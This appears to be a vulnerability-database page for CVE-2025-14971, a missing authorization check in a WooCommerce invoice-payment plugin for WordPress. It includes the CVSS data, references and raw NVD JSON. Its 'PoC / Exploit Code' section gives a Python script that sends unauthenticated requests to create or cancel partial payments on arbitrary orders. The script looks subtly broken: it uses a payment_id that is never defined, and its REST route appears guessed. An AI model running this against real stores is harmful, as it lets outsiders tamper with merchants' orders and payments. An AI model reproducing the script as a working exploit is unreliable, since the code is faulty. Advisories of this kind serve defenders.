CVE-2025-14971

Description

The Link Invoice Payment for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the createPartialPayment and cancelPartialPayment functions in all versions up to, and including, 2.8.0. This makes it possible for unauthenticated attackers to create partial payments on any order or cancel any existing partial payment via ID enumeration.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Link Invoice Payment for WooCommerce <= 2.8.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

target = 'http://target-site.com'
order_id = 123

# 创建部分支付
requests.post(f'{target}/wp-json/wc/v3/orders/{order_id}/partial-payment', json={'amount': 50})

# 取消部分支付
requests.delete(f'{target}/wp-json/wc/v3/orders/{order_id}/partial-payment/{payment_id}')

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14971
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14971
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14971/
[4] VulDB https://vuldb.com/cve/CVE-2025-14971
[5] https://plugins.trac.wordpress.org/browser/invoice-payment-for-woocommerce/tags/2.8.0/Includes/WcPaymentInvoiceEndpoint.php#L179
[6] https://plugins.trac.wordpress.org/browser/invoice-payment-for-woocommerce/tags/2.8.0/Includes/WcPaymentInvoiceEndpoint.php#L19
[7] https://www.wordfence.com/threat-intel/vulnerabilities/id/96a8fc8b-6f0a-486c-89d1-7211b4ca31bd?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14971", "sourceIdentifier": "[email protected]", "published": "2026-01-27T07:16:05.880", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Link Invoice Payment for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the createPartialPayment and cancelPartialPayment functions in all versions up to, and including, 2.8.0. This makes it possible for unauthenticated attackers to create partial payments on any order or cancel any existing partial payment via ID enumeration."}, {"lang": "es", "value": "El plugin Link Invoice Payment para WooCommerce para WordPress es vulnerable a la modificación no autorizada de datos debido a una falta de verificación de capacidad en las funciones createPartialPayment y cancelPartialPayment en todas las versiones hasta la 2.8.0, inclusive. Esto hace posible que atacantes no autenticados creen pagos parciales en cualquier pedido o cancelen cualquier pago parcial existente mediante enumeración de ID."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/invoice-payment-for-woocommerce/tags/2.8.0/Includes/WcPaymentInvoiceEndpoint.php#L179", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/invoice-payment-for-woocommerce/tags/2.8.0/Includes/WcPaymentInvoiceEndpoint.php#L19", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/96a8fc8b-6f0a-486c-89d1-7211b4ca31bd?source=cve", "source": "[email protected]"}]}}